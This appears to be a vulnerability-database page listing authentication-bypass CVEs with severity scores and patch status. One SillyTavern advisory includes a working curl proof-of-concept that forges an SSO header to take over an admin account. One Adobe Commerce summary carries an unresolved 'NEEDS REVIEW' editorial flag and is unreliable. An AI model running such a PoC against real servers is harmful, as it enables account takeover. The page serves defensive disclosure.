Skip to main content

Authentication Bypass

31274 CVEs technique

Monthly

CVE-2026-0241 MEDIUM PATCH This Month

Incorrect Authorization in Palo Alto Networks Trust Protection Foundation allows adjacent-network unauthenticated attackers to bypass access controls and perform unauthorized actions against restricted resources. Affected version branches include 24.1.x, 24.3.x, 25.1.x, and 25.3.x, with fixed builds available from Palo Alto Networks. No public exploit identified at time of analysis, EPSS sits at the 1st percentile (0.01%), and SSVC rates exploitation as none - but the high availability impact component (VA:H in CVSS 4.0) on vulnerable systems makes patching a priority for organizations with exposed deployments.

Authentication Bypass Trust Protection Foundation
NVD VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-0246 MEDIUM PATCH This Month

Local privilege escalation in Palo Alto Networks Prisma Access Agent (all versions prior to 26.2.1) allows any locally authenticated non-administrative user to elevate to root on macOS and Linux, or NT AUTHORITY\SYSTEM on Windows, by exploiting a flawed privilege management mechanism. Successful exploitation grants full control of the affected endpoint, enabling arbitrary code execution and unauthorized access to data restricted to privileged accounts. No public exploit exists and the vulnerability is absent from CISA KEV; however, SSVC rates technical impact as total, making patching a meaningful priority for multi-user and enterprise endpoint environments.

Google RCE Apple Paloalto Microsoft +2
NVD VulDB
CVSS 4.0
5.9
EPSS
0.0%
CVE-2026-0247 MEDIUM PATCH This Month

Authorization bypass in Palo Alto Networks Prisma Access Agent's Endpoint DLP component permits a locally authenticated attacker with low privileges to circumvent authentication controls and invoke privileged operations. Affected are all Prisma Access Agent versions prior to 26.2.1, with full confidentiality, integrity, and availability impact on the vulnerable component confirmed by the CVSS:4.0 vector (VC:H/VI:H/VA:H). No active exploitation has been identified - SSVC marks exploitation as 'none', EPSS sits at the 1st percentile, and the CVSS exploit maturity is rated 'Unreported' (E:U).

Authentication Bypass Prisma Access Agent
NVD VulDB
CVSS 4.0
5.9
EPSS
0.0%
CVE-2026-0249 MEDIUM PATCH This Month

Improper certificate validation in Palo Alto Networks GlobalProtect App exposes macOS and Android users to adversary-in-the-middle attacks from locally adjacent network positions, enabling traffic interception and malicious software installation. The flaw allows an unauthenticated attacker on the same subnet - or a local non-administrative OS user - to redirect encrypted VPN communications to a rogue server by bypassing TLS certificate checks. No public exploit has been identified at time of analysis, EPSS is effectively zero, and CISA SSVC rates exploitation as none, though the high confidentiality and integrity impact on the vulnerable component warrants prompt patching on affected platforms.

Apple Paloalto Microsoft Authentication Bypass Globalprotect App
NVD VulDB
CVSS 4.0
4.9
EPSS
0.0%
CVE-2026-33584 MEDIUM PATCH This Month

Unauthenticated access to an exposed Keycloak management service in the Arqit Symmetric Key Agreement Platform allows remote attackers to read sensitive operational data including application metrics and health status without any credentials. All versions of the platform prior to 26.03 are affected. The CVSS vector (PR:N/AC:L) confirms no authentication is required and exploitation is straightforward; however, EPSS at 0.01% (1st percentile) and SSVC exploitation status of 'none' indicate no public exploit or active targeting observed at time of analysis.

Authentication Bypass Symmetric Key Agreement Platform
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-0257 HIGH POC KEV PATCH THREAT Act Now

Authentication bypass in the GlobalProtect portal and gateway of Palo Alto Networks PAN-OS allows remote attackers to establish unauthorized VPN connections without valid credentials. The flaw is confirmed actively exploited (CISA KEV) and publicly available exploit code exists, though EPSS remains low at 0.05%, suggesting targeted rather than mass exploitation. Panorama and Cloud NGFW deployments are not affected, but PAN-OS firewalls and Prisma Access tenants running vulnerable trains are exposed.

Paloalto Authentication Bypass
NVD VulDB GitHub
CVSS 4.0
7.8
EPSS
0.1%
Threat
4.6
CVE-2026-0235 MEDIUM PATCH This Month

Policy bypass in Palo Alto Networks Prisma® Browser allows a locally authenticated non-admin user to circumvent access and data control policies via a race condition, potentially exposing restricted data with high confidentiality impact to the vulnerable system. Affected versions span all releases prior to 146.16.6.165, per EUVD-2026-30087 and vendor advisory. No active exploitation is confirmed - the vulnerability is absent from CISA KEV, EPSS sits at 0.01% (3rd percentile), and SSVC assessment categorizes exploitation status as none - indicating this is a low-urgency but architecturally meaningful trust boundary weakness in an enterprise browser control product.

Paloalto Authentication Bypass Prisma Browser
NVD VulDB
CVSS 4.0
5.8
EPSS
0.0%
CVE-2026-0237 HIGH PATCH This Week

Local privilege escalation in Palo Alto Networks Prisma Browser on macOS allows a locally authenticated non-admin user to access an internal automation bridge that was insufficiently restricted, enabling unauthorized commands to be sent to the browser and bypassing built-in security controls. The flaw is tracked as CVE-2026-0237 with a CVSS 4.0 score of 7.3 and no public exploit identified at time of analysis, though SSVC rates the technical impact as total.

Apple Paloalto Authentication Bypass Prisma Browser
NVD VulDB
CVSS 4.0
7.3
EPSS
0.0%
CVE-2026-0265 HIGH PATCH NEWS This Week

Authentication bypass in Palo Alto Networks PAN-OS allows unauthenticated network attackers to circumvent authentication controls when the Cloud Authentication Service (CAS) feature is enabled, with the highest risk when CAS is bound to the management interface. The flaw affects PA-Series and VM-Series firewalls as well as Panorama (virtual and M-Series); Cloud NGFW and Prisma Access are not impacted. No public exploit identified at time of analysis, and EPSS rates real-world exploitation probability low at 0.08%, but the high-value target profile and CWE-347 (Improper Verification of Cryptographic Signature) class - combined with the 'Jwt Attack' tag - warrant prompt patching.

Paloalto Authentication Bypass Jwt Attack Cloud Ngfw Pan Os +1
NVD VulDB
CVSS 4.0
7.2
EPSS
0.1%
CVE-2026-36738 MEDIUM This Month

U-SPEED AC1200 Gigabit Wi-Fi Router Model T18-21K V1.0 exposes an unauthenticated UART serial interface that grants unrestricted access to device functionality upon physical connection. An attacker with physical access to the exposed UART pins can bypass all authentication and authorization controls to gain full device compromise. EPSS exploitation probability is low (0.03%), reflecting the physical access requirement, though the impact of successful exploitation is severe (confidentiality, integrity, and availability compromise).

Authentication Bypass T18 21K Firmware
NVD GitHub VulDB
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-45371 Go HIGH PATCH GHSA This Week

Authorization bypass in SiYuan note-taking platform versions up to and including v3.6.5 allows publish-mode Readers (anonymous visitors) and read-only Editors to invoke eight state-mutating APIs that are missing CheckAdminRole and CheckReadonly middleware. Attackers with only basic CheckAuth (including unauthenticated publish visitors) can rewrite the workspace conf.json, manipulate cloud sync intervals, overwrite graph configuration, poison the SQL block index, and tamper with the admin's recent-documents list. No public exploit identified at time of analysis, but a detailed PoC accompanies the advisory and EPSS sits at 0.04% (12th percentile).

Authentication Bypass Information Disclosure Docker
NVD GitHub VulDB
CVSS 4.0
7.2
EPSS
0.0%
CVE-2026-45083 Maven CRITICAL PATCH GHSA Act Now

Unauthenticated Solr streaming expression injection in Goobi viewer Core (versions 4.8.0 through 26.04) allows remote attackers to fully read, modify, or delete the backend Solr index by posting arbitrary expressions to the `/api/v1/index/stream` endpoint. No public exploit identified at time of analysis, but the vulnerability is trivially exploitable with CVSS 9.8 and bypasses access-condition protections such as moving walls and licence restrictions. EPSS is currently low (0.04%) reflecting the niche audience rather than technical difficulty.

Authentication Bypass Apache Tomcat
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-45148 Go MEDIUM PATCH GHSA This Month

Broken access control in SiYuan's publish-service API allows authenticated RoleReader principals to enumerate workspace metadata from notebooks explicitly marked as private or publish-ignored. Four search endpoints - `/api/search/searchTag`, `/api/search/searchAsset`, `/api/search/searchWidget`, and `/api/search/searchTemplate` - pass the `CheckAuth` middleware that a publish-service RoleReader JWT satisfies, but never apply the `IsReadOnlyRoleContext` filtering logic that sibling endpoints in the same file correctly implement, returning unscoped global workspace results. A proof-of-concept exploit exists per SSVC assessment and is documented in the advisory; the vulnerability is not currently listed in CISA KEV.

Authentication Bypass
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-45147 Go MEDIUM PATCH GHSA This Month

Broken access control in SiYuan's `/api/tag/getTag` endpoint (versions prior to 3.7.0) allows any authenticated low-privilege user - including publish-service `RoleReader` accounts and `RoleEditor` accounts on read-only workspaces - to mutate the global `Conf.Tag.Sort` configuration value and trigger a full rewrite of the workspace `conf.json` file. The handler silently executes a privileged write operation (`model.Conf.Save()`) when a `sort` argument is present, despite the endpoint being registered with only `model.CheckAuth` middleware, omitting the `model.CheckAdminRole` and `model.CheckReadonly` guards that sibling write endpoints correctly enforce. Publicly available exploit code exists per SSVC assessment, though no active exploitation has been confirmed (not in CISA KEV; EPSS 0.03%).

Authentication Bypass Docker
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-44794 PyPI MEDIUM PATCH GHSA This Month

Nautobot's REST API fails to enforce user 'view' permissions when resolving GenericForeignKey references during object creation or update, allowing authenticated users to create cross-object associations to records they are explicitly denied access to view. Any Nautobot user holding write access to an affected model - including ImageAttachment, Cable, Note, ContactAssociation, and over a dozen others - can link those records to restricted objects (e.g., Devices) if they know the target's UUID through any side channel. No public exploit has been identified and this vulnerability is not listed in CISA KEV; EPSS of 0.02% (6th percentile) reflects low probability of automated exploitation, though the authorization bypass is straightforward once credentials and a target UUID are in hand.

Authentication Bypass
NVD GitHub VulDB
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-44774 Go MEDIUM PATCH GHSA This Month

Unauthorized write access to Traefik's live dynamic configuration is achievable by a low-privileged Kubernetes tenant in shared Gateway deployments, because the Gateway API provider's `isInternalService()` check accepts any `TraefikService` name ending in `@internal` - not exclusively the intended `api@internal`. This allows a tenant with `HTTPRoute` creation rights to route external traffic to `rest@internal`, fully bypassing the `providers.rest.insecure=false` safeguard and gaining `PUT /api/providers/rest` write access. No active exploitation is confirmed (not in CISA KEV, EPSS at 0.01%), but a detailed proof-of-concept is published in the GHSA advisory and the SSVC framework marks the attack as automatable for tenants meeting the prerequisites.

Denial Of Service Authentication Bypass Kubernetes
NVD GitHub VulDB
CVSS 4.0
6.4
EPSS
0.0%
CVE-2026-43482 MEDIUM PATCH This Month

A race condition in the Linux kernel's sched_ext BPF scheduler subsystem allows a local low-privileged user to permanently hang the system when sched_ext is actively loaded. Between scx_claim_exit() atomically marking error exit and the subsequent kick of the helper kthread, a preemption window exists where the BPF scheduler - now with error handling disabled - may fail to reschedule the calling task, leaving the helper work permanently unqueued. The result is bypass mode never activating, task dispatching halting, and a complete system wedge. No public exploit has been identified and EPSS sits at 0.02% (5th percentile), but the availability impact is total for affected systems running a custom BPF scheduler.

Authentication Bypass Linux Red Hat Suse
NVD VulDB
CVSS 3.1
5.5
EPSS
0.0%
CVE-2020-37220 HIGH POC This Week

Huawei HG630 V2 router contains an authentication bypass vulnerability that allows unauthenticated attackers to obtain administrative access by retrieving the device serial number. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Huawei Authentication Bypass
NVD Exploit-DB VulDB
CVSS 4.0
8.7
EPSS
0.1%
CVE-2026-40460 MEDIUM PATCH This Month

NGINX Plus and NGINX Open Source configured with the HTTP/3 QUIC module allows unauthenticated remote attackers to spoof source IP addresses, enabling bypass of authorization checks and rate-limiting controls. The vulnerability affects both commercial and open-source variants when QUIC is explicitly enabled, with patches available from F5.

Authentication Bypass Nginx Nginx Plus Nginx Open Source
NVD VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-42930 HIGH PATCH This Week

Authenticated administrators in F5 BIG-IP Appliance mode can bypass configuration restrictions designed to prevent system-level access. Administrators with the 'Administrator' role can circumvent Appliance mode lockdown controls, potentially modifying underlying system configurations that should be protected in this deployment mode. Vendor patch available per F5 Security Advisory K000160876. CVSS 8.5 reflects high confidentiality/integrity impact despite requiring privileged authentication.

Authentication Bypass Big Ip
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-8369 MEDIUM This Month

Improper Input Validation in the NAT64 translator in The OpenThread Authors OpenThread before commit 26a882d on all platforms allows an attacker on the adjacent IPv4 network to inject corrupted IPv6 packets into the Thread mesh or bypass security checks via crafted IPv4 packets with options.

Authentication Bypass Openthread
NVD GitHub
CVSS 4.0
6.0
EPSS
0.0%
CVE-2026-4609 HIGH This Week

Authenticated subscribers can bypass authorization gates and forcibly join any ProfileGrid group - including closed, paid, or restricted groups - through a missing capability check in the pm_invite_user function. Affects all ProfileGrid plugin versions up to 5.9.8.4. The vulnerability enables low-privilege users to circumvent membership restrictions and payment requirements, potentially exposing premium content and private community spaces. EPSS data not provided; no CISA KEV listing identified, indicating no confirmed widespread exploitation at time of analysis. CVSS 7.1 reflects high integrity impact due to authorization bypass capabilities.

Authentication Bypass WordPress
NVD
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-4607 MEDIUM This Month

Authentication bypass in ProfileGrid - User Profiles, Groups and Communities WordPress plugin up to version 5.9.8.4 allows authenticated Subscriber-level users to modify site-wide group settings through unprotected AJAX actions (pm_set_group_order, pm_set_group_items, pm_set_field_order). Attackers can alter group menu order, list order, icon display, and field ordering without authorization checks. No public exploit code or active exploitation has been identified; CVSS 4.3 (low-moderate severity) reflects limited impact scope to integrity without confidentiality or availability impact.

Authentication Bypass WordPress
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-3426 MEDIUM This Month

RTMKit Addons for Elementor plugin for WordPress allows authenticated attackers with Author-level access or higher to modify or reset site-wide widget configurations due to missing capability checks in the save_widget() and reset_all_widgets() functions. This privilege escalation vulnerability affects all versions up to 2.0.2 and enables unauthorized modification of widget data across the entire WordPress site, impacting site integrity and user experience.

Authentication Bypass WordPress
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-2515 MEDIUM This Month

Authenticated attackers with Subscriber-level access can modify the API key stored in the Hostinger Reach WordPress plugin (versions up to 1.3.8) due to missing capability checks in the AJAX handler, but only when the plugin is not yet connected to a site and the database contains no existing API key. The vulnerability allows unauthorized data modification via the 'hostinger_reach_connection_notice_action' action with CVSS 5.3 (network-accessible, high integrity impact, but requiring low-privilege authentication and non-standard conditions).

Authentication Bypass WordPress
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-2725 MEDIUM This Month

Incorrect authorization in the "submitted together" feature in Gerrit versions 2.12 and later allows an authenticated attacker with force push permissions on a secondary branch to bypass code review and forcefully submit code to restricted branches via a crafted submission matching the "topic" tag of an unapproved change.

Authentication Bypass Gerrit
NVD VulDB
CVSS 4.0
6.0
EPSS
0.0%
CVE-2026-6965 MEDIUM This Month

Authenticated instructors in Tutor LMS versions up to 3.9.9 can manipulate course ownership logic via an attacker-controlled GET parameter to perform unauthorized operations on other instructors' courses, including deleting lessons, quizzes, assignments, and student data, or modifying course content and grades. The vulnerability stems from the `get_course_id_by()` function unconditionally trusting user-supplied input instead of validating course ownership, bypassing the plugin's primary authorization gate. No public exploit code or active exploitation has been identified at time of analysis.

Authentication Bypass WordPress
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2025-14033 MEDIUM This Month

Unauthenticated attackers can retrieve any support ticket content from the ilGhera Support System for WooCommerce plugin (versions up to 1.3.0) by exploiting a missing capability check in the 'get_ticket_content_callback' function, exposing sensitive customer data and private communications without authentication. The vulnerability requires only a valid ticket ID and network access, with no active public exploitation confirmed at time of analysis, but the low attack complexity and unauthenticated nature make it practically exploitable against any WordPress site running the affected plugin.

Authentication Bypass WordPress
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-7051 MEDIUM This Month

Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress versions up to 8.9.0 allows authenticated attackers to delete any user's published and scheduled social media post records due to missing ownership verification in the deleteUserPublishPost() and deleteUserSchedPost() functions. Attackers can supply arbitrary sequential post IDs to permanently soft-delete other users' B2S post records, disrupting content publishing workflows across multiuser WordPress installations. This vulnerability requires valid WordPress user authentication but no elevated privileges.

Authentication Bypass WordPress
NVD
CVSS 3.1
5.4
EPSS
0.1%
CVE-2025-9988 MEDIUM This Month

Broadstreet WordPress plugin up to version 1.53.1 allows authenticated attackers with Subscriber-level access to create advertisers via missing capability checks on the create_advertiser AJAX action, enabling privilege escalation and unauthorized modification of advertising data.

Authentication Bypass WordPress
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2025-14755 MEDIUM This Month

Unauthenticated attackers can manipulate product prices in WooCommerce carts via an unprotected AJAX action in the Cost Calculator Builder plugin for WordPress (versions up to 4.0.1) when used with Cost Calculator Builder PRO. The vulnerability stems from the ccb_woocommerce_payment AJAX endpoint being registered without authentication requirements (wp_ajax_nopriv) and failing to validate user input before passing it to checkout initialization, allowing price modification without authorization. This is an Insecure Direct Object Reference (IDOR) flaw with moderate CVSS score (5.3) that enables integrity violations but not confidentiality breaches or availability impact.

Authentication Bypass WordPress
NVD
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-44720 npm MEDIUM PATCH GHSA This Month

OpenLearnX versions prior to 2.0.4 contain a critical authentication bypass vulnerability caused by disabled JWT signature verification, enabling unauthenticated attackers to gain unauthorized access to user accounts. The vulnerability has been patched in version 2.0.4. No public exploit code or active exploitation has been identified at time of analysis.

Authentication Bypass
NVD GitHub
CVSS 4.0
6.9
EPSS
0.0%
CVE-2025-27853 HIGH This Week

Authentication bypass in Garmin WDU v1 1.4.6 and v2 5.0 allows remote unauthenticated attackers to execute arbitrary commands via WebSocket API. The web interface implements client-side-only authentication while the WebSocket backend enforces no authentication, enabling complete bypass by directly accessing remote APIs. With CVSS 7.3 (AV:N/AC:L/PR:N) but only 0.03% EPSS probability, this represents a critical design flaw in deployed devices rather than actively exploited widespread threat. No public exploit identified at time of analysis.

Authentication Bypass
NVD VulDB
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-44352 MEDIUM This Month

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, Broken Access Control allows reading of sketch logs from any user. This vulnerability is fixed in 1.2.3.

Authentication Bypass
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-42158 LOW Monitor

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, an adversary with knowledge of an investigation ID, could update the metadata of an investigation of another user. This vulnerability is fixed in 1.2.3.

Authentication Bypass
NVD GitHub
CVSS 4.0
2.3
EPSS
0.0%
CVE-2026-44341 MEDIUM This Month

GoJobs is a REST API for a Job Board platform. The application exposes a job retrieval endpoint that allows unauthenticated users to access job details by directly manipulating object identifiers. The endpoint lacks proper authentication and authorization checks, resulting in unauthorized access to job data.

Authentication Bypass Gojobs
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-44547 CRITICAL Act Now

ChurchCRM is an open-source church management system. From 7.2.0 to 7.2.2, The fix for CVE-2026-4058 is incomplete. The hardening commit was merged and then silently stripped from src/api/routes/public/public-user.php by an unrelated PR before any 7.2.x tag was cut. Every shipped 7.2.x release therefore remains exploitable by the PoC published with the original advisory. This vulnerability is fixed in 7.3.1.

Authentication Bypass PHP
NVD GitHub
CVSS 3.1
9.6
EPSS
0.0%
CVE-2026-5371 HIGH This Week

The MonsterInsights - Google Analytics Dashboard for WordPress (Website Stats Made Easy) plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability checks on the get_ads_access_token() and reset_experience() functions in all versions up to, and including, 10.1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve live Google OAuth access tokens and reset Plugins's Google Ads integration.

Authentication Bypass WordPress Google
NVD
CVSS 3.1
7.1
EPSS
0.0%
CVE-2026-44649 npm CRITICAL PATCH GHSA Act Now

## Resolution SillyTavern 1.18.0 now includes a configuration option to limit which IP addresses can authorize using SSO headers, limiting to just loopback addresses by default. A setting can be customized according to user's needs. Documentation: https://docs.sillytavern.app/administration/sso/ ## Summary SillyTavern accepts `Remote-User` (Authelia) and `X-Authentik-Username` (Authentik) HTTP headers to automatically log in users when SSO is configured. There is no validation that these headers originate from a trusted reverse proxy. Any network client that can reach the SillyTavern port directly can inject these headers and authenticate as any user, including administrators, without a password. This vulnerability is exploitable only when `sso.autheliaAuth: true` or `sso.authentikAuth: true` is set in `config.yaml` (both default to `false`). ### Detials SillyTavern implements header-based SSO for Authelia and Authentik. When enabled, the `tryAutoLogin` function (called on every request to `/login`) invokes `headerUserLogin`, which reads an HTTP header set by the upstream proxy and automatically creates an authenticated session for the matching user: `src/users.js:779-801`: ```js async function headerUserLogin(request, header = 'Remote-User') { if (!request.session) { return false; } const remoteUser = request.get(header); // reads any header from any client if (!remoteUser) { return false; } const userHandles = await getAllUserHandles(); for (const userHandle of userHandles) { if (remoteUser.toLowerCase() === userHandle) { const user = await storage.getItem(toKey(userHandle)); if (user && user.enabled) { request.session.handle = userHandle; return true; } } } return false; } ``` `request.get(header)` is Express's wrapper for `req.headers[name.toLowerCase()]`. Express does not distinguish between headers set by a trusted upstream proxy and headers injected by the end client. Without an IP allowlist check, any client can set `Remote-User: ` and receive an authenticated session cookie. ### User Enumeration Pre-Condition The `/api/users/list` endpoint is registered before `requireLoginMiddleware` in `src/server-main.js:236`, making it publicly accessible without authentication: `src/server-main.js:236,239`: ```js app.use('/api/users', usersPublicRouter); // line 236 (public) app.use(requireLoginMiddleware); // line 239 (auth gate) ``` `src/endpoints/users-public.js:26-57`: ```js router.post('/list', async (_request, response) => { if (DISCREET_LOGIN) { return response.sendStatus(204); } const users = await storage.values(x => x.key.startsWith(KEY_PREFIX)); return response.json(viewModels); // returns handle, name, avatar, admin, password flags }); ``` This allows an attacker to enumerate all user handles (including admin handles) without any prior credentials. ## PoC ```bash TARGET="http://localhost:8000" # enumerate users curl -s -X POST "$TARGET/api/users/list" -H "Content-Type: application/json" -d '{}' # inject Remote-User header, receive authsession curl -s -L \ -H "Remote-User: admin-user" \ -c /tmp/st-session.txt \ "$TARGET/login" # obtain CSRF token, call admin API TOKEN=$(curl -s -b /tmp/st-session.txt "$TARGET/csrf-token" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") curl -s -X POST "$TARGET/api/users/admin/get" \ -H "Content-Type: application/json" \ -H "X-CSRF-Token: $TOKEN" \ -b /tmp/st-session.txt \ -d '{}' ``` --- ## Impact An account takeover, allowing an attacker to do anything a legitimately authorized user can do.

Authentication Bypass CSRF
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-42855 HIGH PATCH This Week

arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. Prior to 3.3.8, the WebServer Digest authentication implementation in arduino-esp32 computes the authentication hash using the URI field from the client's Authorization header, without verifying that it matches the actual requested URI. This allows an attacker who possesses any valid digest response (computed for URI-A) to authenticate requests to a completely different protected URI (URI-B), bypassing per-resource access control. This vulnerability is fixed in 3.3.8.

Authentication Bypass Arduino Esp32
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-45227 HIGH PATCH This Week

Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.

Authentication Bypass Python Heym
NVD GitHub
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-45226 HIGH PATCH This Week

Heym before 0.0.21 contains an authorization bypass vulnerability in workflow execution that allows authenticated users to execute arbitrary workflows by referencing victim workflow UUIDs without proper access validation. Attackers can create workflows with execute nodes or agent subWorkflowIds pointing to victim workflow UUIDs to load and execute those workflows under attacker-controlled execution paths, exposing victim workflow outputs and triggering workflow nodes with unintended side effects.

Authentication Bypass Heym
NVD GitHub
CVSS 4.0
7.6
EPSS
0.1%
CVE-2026-44260 HIGH PATCH This Week

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, the readonly flag set on the <efw:elFinder> JSP tag is intended to prevent file modifications. When protected=true, elfinder_checkRisk enforces that the client sends readonly=true (matching the session value), but no event handler checks the readonly value before performing write operations. The flag only controls client-side UI elements (disabling buttons) and response metadata (write: 0, locked: 1). An attacker who sends requests directly (bypassing the UI) can perform all file operations despite readonly=true. This vulnerability is fixed in 4.08.010.

Authentication Bypass Efw4 X
NVD GitHub
CVSS 3.1
8.1
EPSS
0.0%
CVE-2026-26289 HIGH CISA Act Now

PowerSYSTEM Center REST API endpoint for device account export allows an authenticated user with limited permissions to expose sensitive information normally restricted to administrative permissions only.

Authentication Bypass Powersystem Center 2020 Powersystem Center 2024 Powersystem Center 2026
NVD GitHub
CVSS 4.0
8.4
EPSS
0.0%
CVE-2026-33570 MEDIUM CISA This Month

PowerSYSTEM Center REST API endpoint for devices allows a low privilege authenticated user to access information normally limited by operational permissions.

Authentication Bypass Powersystem Center 2020
NVD GitHub
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-35555 HIGH CISA Act Now

PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups.

Authentication Bypass Powersystem Center 2024 Powersystem Center 2026
NVD GitHub
CVSS 4.0
7.0
EPSS
0.0%
CVE-2026-34656 MEDIUM This Month

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Improper Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page.

Authentication Bypass Adobe
NVD
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-34685 LOW Monitor

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier [NEEDS REVIEW: impact mismatch - ticket says 'Arbitrary file system write', CIA triad derives 'Security Feature Bypass'. Verify CVSS vector before publishing.] are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. A high-privileged attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.

Authentication Bypass Adobe Adobe Commerce
NVD VulDB
CVSS 3.1
3.4
EPSS
0.0%
CVE-2026-34645 HIGH This Week

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction.

Authentication Bypass Adobe
NVD
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-34646 HIGH This Week

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction.

Authentication Bypass Adobe
NVD
CVSS 3.1
7.5
EPSS
0.1%
CVE-2026-42889 CRITICAL PATCH Act Now

Relay adds real-time collaboration to Obsidian. Relay Server versions 0.9.0 through 0.9.6 contain an authentication bypass in the multi-document WebSocket endpoints. When authentication is configured, WebSocket connections without a token query parameter were incorrectly treated as having full server permissions. An unauthenticated network attacker who knows or guesses a document ID could connect to the document sync WebSocket and read or modify document contents without a valid document token. This vulnerability is fixed in 0.9.7.

Authentication Bypass Relay Server
NVD GitHub
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-44873 MEDIUM This Month

A session management vulnerability in AOS-8 allows previously authenticated users to retain network access after their accounts are administratively disabled. Existing sessions are not invalidated when credentials are revoked, enabling continued access until session expiration. An attacker with compromised credentials could exploit this behavior to maintain unauthorized access even after the account has been disabled.

Authentication Bypass Hpe Aruba Networking Wireless Operating System Aos
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-44874 MEDIUM This Month

A vulnerability exists in the web-based management interface of an AOS-10 Gateway that could allow an authenticated remote attacker to access sensitive files on the underlying operating system. Successful exploitation of this vulnerability could result in the disclosure of confidential system information, potentially enabling further attacks against the affected device.

Authentication Bypass Hpe Aruba Networking Wireless Operating System Aos
NVD
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-34660 CRITICAL Act Now

Adobe Connect versions 2025.9.15, 2025.8.157 and earlier are affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.

Authentication Bypass Adobe RCE
NVD
CVSS 3.1
9.3
EPSS
0.5%
CVE-2026-5146 MEDIUM This Month

Unauthenticated attackers can modify or delete arbitrary user notification records in Devolutions Server due to missing session validation in notification management endpoints. The vulnerability affects Devolutions Server 2025.3.19.0 and earlier, plus versions 2026.1.6.0 through 2026.1.15.0. CVSS 4.3 indicates low-to-moderate risk, but the EPSS percentile of 4% suggests this is not a high-priority target for automated exploitation despite the authentication bypass tag.

Authentication Bypass Devolutions Server
NVD VulDB
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-44196 CRITICAL PATCH Act Now

Pingvin Share X is a secure and easy self-hosted file sharing platform. From 1.14.1 to 1.16.2, a critical authentication bypass vulnerability allows an attacker who has obtained a valid username and password to skip the second-factor authentication (TOTP) requirement entirely. Although, an attacker still needs the user's password to reach this stage. This vulnerability is fixed in 1.16.3.

Authentication Bypass
NVD GitHub
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-44183 CRITICAL PATCH Act Now

